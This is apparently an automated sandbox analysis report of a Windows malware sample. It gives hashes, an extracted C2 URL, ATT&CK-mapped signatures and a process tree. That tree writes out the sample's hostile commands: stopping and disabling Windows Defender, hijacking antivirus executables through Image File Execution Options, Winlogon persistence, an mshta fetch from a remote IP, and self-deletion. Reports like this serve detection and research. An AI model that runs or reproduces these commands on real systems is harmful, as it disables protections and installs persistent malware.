Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
11/09/2024, 21:59
Static task
static1
Behavioral task
behavioral1
Sample
db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe
-
Size
2.4MB
-
MD5
db4ace64bd68a5dd2216f8ca434fca9a
-
SHA1
ce2d845d9b18146d0421a7dc8287222f36ce1b97
-
SHA256
ae6d422ad843f1cc62787469aa16677c15d47f6cd4a2f8632bbba415e580859f
-
SHA512
8f5d5dec82ebdf23724577b2703ed1cf2689c3e5f758434b93ede7eabc3468a50259bcb337c8d7483f1bcfd86394b28bc9fcfa80e67a97f3846c8f379d05b873
-
SSDEEP
49152:iQfN3JxzrjFhdn1MD7NT/LKTIijR3XDCmkoNGLc7pPwu3TXn:iQ3xrnp6aTIOGmko8Lc7pfjn
Malware Config
Extracted
http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=DSEYXUOD&2=i-s&3=72&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\xxomgr.exe" xxomgr.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 8 4444 mshta.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" xxomgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe xxomgr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" xxomgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe xxomgr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" xxomgr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" xxomgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe xxomgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe xxomgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe xxomgr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" xxomgr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe xxomgr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" xxomgr.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 1072 xxomgr.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4556 sc.exe 2448 sc.exe 2556 sc.exe 4928 sc.exe 2972 sc.exe 2632 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xxomgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1072 xxomgr.exe Token: SeShutdownPrivilege 1072 xxomgr.exe Token: SeDebugPrivilege 1072 xxomgr.exe Token: SeShutdownPrivilege 1072 xxomgr.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe 1072 xxomgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1072 xxomgr.exe 1072 xxomgr.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 3124 wrote to memory of 4556 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 86 PID 3124 wrote to memory of 4556 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 86 PID 3124 wrote to memory of 4556 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 86 PID 3124 wrote to memory of 2448 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 87 PID 3124 wrote to memory of 2448 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 87 PID 3124 wrote to memory of 2448 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 87 PID 3124 wrote to memory of 1828 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 88 PID 3124 wrote to memory of 1828 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 88 PID 3124 wrote to memory of 1828 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 88 PID 3124 wrote to memory of 2556 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 89 PID 3124 wrote to memory of 2556 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 89 PID 3124 wrote to memory of 2556 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 89 PID 3124 wrote to memory of 1072 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 94 PID 3124 wrote to memory of 1072 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 94 PID 3124 wrote to memory of 1072 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 94 PID 1828 wrote to memory of 1824 1828 net.exe 95 PID 1828 wrote to memory of 1824 1828 net.exe 95 PID 1828 wrote to memory of 1824 1828 net.exe 95 PID 3124 wrote to memory of 3916 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 96 PID 3124 wrote to memory of 3916 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 96 PID 3124 wrote to memory of 3916 3124 db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe 96 PID 1072 wrote to memory of 2632 1072 xxomgr.exe 98 PID 1072 wrote to memory of 2632 1072 xxomgr.exe 98 PID 1072 wrote to memory of 2632 1072 xxomgr.exe 98 PID 1072 wrote to memory of 2972 1072 xxomgr.exe 99 PID 1072 wrote to memory of 2972 1072 xxomgr.exe 99 PID 1072 wrote to memory of 2972 1072 xxomgr.exe 99 PID 1072 wrote to memory of 1236 1072 xxomgr.exe 100 PID 1072 wrote to memory of 1236 1072 xxomgr.exe 100 PID 1072 wrote to memory of 1236 1072 xxomgr.exe 100 PID 1072 wrote to memory of 4928 1072 xxomgr.exe 101 PID 1072 wrote to memory of 4928 1072 xxomgr.exe 101 PID 1072 wrote to memory of 4928 1072 xxomgr.exe 101 PID 1236 wrote to memory of 4884 1236 net.exe 106 PID 1236 wrote to memory of 4884 1236 net.exe 106 PID 1236 wrote to memory of 4884 1236 net.exe 106 PID 1072 wrote to memory of 4444 1072 xxomgr.exe 107 PID 1072 wrote to memory of 4444 1072 xxomgr.exe 107 PID 1072 wrote to memory of 4444 1072 xxomgr.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\db4ace64bd68a5dd2216f8ca434fca9a_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4556
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:1824
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2556
-
-
C:\Users\Admin\AppData\Roaming\xxomgr.exeC:\Users\Admin\AppData\Roaming\xxomgr.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2972
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:4884
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4928
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=DSEYXUOD&2=i-s&3=72&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:4444
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\DB4ACE~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:3916
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5db4ace64bd68a5dd2216f8ca434fca9a
SHA1ce2d845d9b18146d0421a7dc8287222f36ce1b97
SHA256ae6d422ad843f1cc62787469aa16677c15d47f6cd4a2f8632bbba415e580859f
SHA5128f5d5dec82ebdf23724577b2703ed1cf2689c3e5f758434b93ede7eabc3468a50259bcb337c8d7483f1bcfd86394b28bc9fcfa80e67a97f3846c8f379d05b873